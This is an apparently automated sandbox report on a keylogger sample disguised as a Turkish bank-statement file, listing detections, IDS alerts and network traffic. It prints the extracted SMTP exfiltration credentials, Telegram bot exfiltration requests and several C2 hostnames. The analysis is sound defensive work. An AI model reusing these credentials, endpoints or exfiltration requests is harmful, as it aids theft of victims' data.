2024-12-10T14:07:39.843321+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49720	132.226.247.73	80	TCP
2024-12-10T14:07:42.952722+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49730	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Hesap_Hareketleri_09122024_html.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Avira: detection malicious, Label: HEUR/AGEN.1306657

Found malware configuration

Source: 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: Hesap_Hareketleri_09122024_html.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Hesap_Hareketleri_09122024_html.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Hesap_Hareketleri_09122024_html.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49718 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49723 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.6:49757 -> 172.67.177.134:443 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49762 version: TLS 1.2

Source: Hesap_Hareketleri_09122024_html.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: jXEBK.pdbSHA256 source: Hesap_Hareketleri_09122024_html.exe, EfgRyiVrT.exe.1.dr
Source:	Binary string: jXEBK.pdb source: Hesap_Hareketleri_09122024_html.exe, EfgRyiVrT.exe.1.dr

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 4x nop then jmp 06F3895Fh	1_2_06F38AC1
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 4x nop then jmp 06F3895Fh	1_2_06F38C4C
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 4x nop then jmp 012DF8E9h	9_2_012DF631
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 4x nop then jmp 012DFD41h	9_2_012DFA88
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 075D7C27h	10_2_075D7D89
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 075D7C27h	10_2_075D7F14
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 02A4F8E9h	14_2_02A4F631
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 02A4FD41h	14_2_02A4FA88
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068C0D0Dh	14_2_068C0B30
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068C1697h	14_2_068C0B30
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068C31E0h	14_2_068C2DC8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068C2C19h	14_2_068C2968
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CE959h	14_2_068CE6B0
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CE0A9h	14_2_068CDE00
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CE501h	14_2_068CE258
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CF661h	14_2_068CF3B8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CEDB1h	14_2_068CEB08
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CF209h	14_2_068CEF60
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CCF49h	14_2_068CCCA0
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CD3A1h	14_2_068CD0F8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CFAB9h	14_2_068CF810
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_068C0040
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CDC51h	14_2_068CD9A8
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068C31E0h	14_2_068C2DBF
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068C31E0h	14_2_068C310E
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 4x nop then jmp 068CD7F9h	14_2_068CD550

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3cbfde0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3c7cdc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/12/2024%20/%2014:26:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:38:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49724 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49720 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49717 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49730 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49745 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49754 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49739 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49761 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49721 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49749 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49726 -> 172.67.177.134:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49718 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49723 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.6:49757 -> 172.67.177.134:443 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/12/2024%20/%2014:26:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:38:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 13:08:01 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 13:08:04 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2380496640.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000A.00000002.2427183768.0000000003321000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4800760804.000000000405F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003F5F000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4799393484.0000000003C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Hesap_Hareketleri_09122024_html.exe, 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4794954969.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_09122024_html.exe, 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, EfgRyiVrT.exe, 0000000E.00000002.4793857289.0000000002D35000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
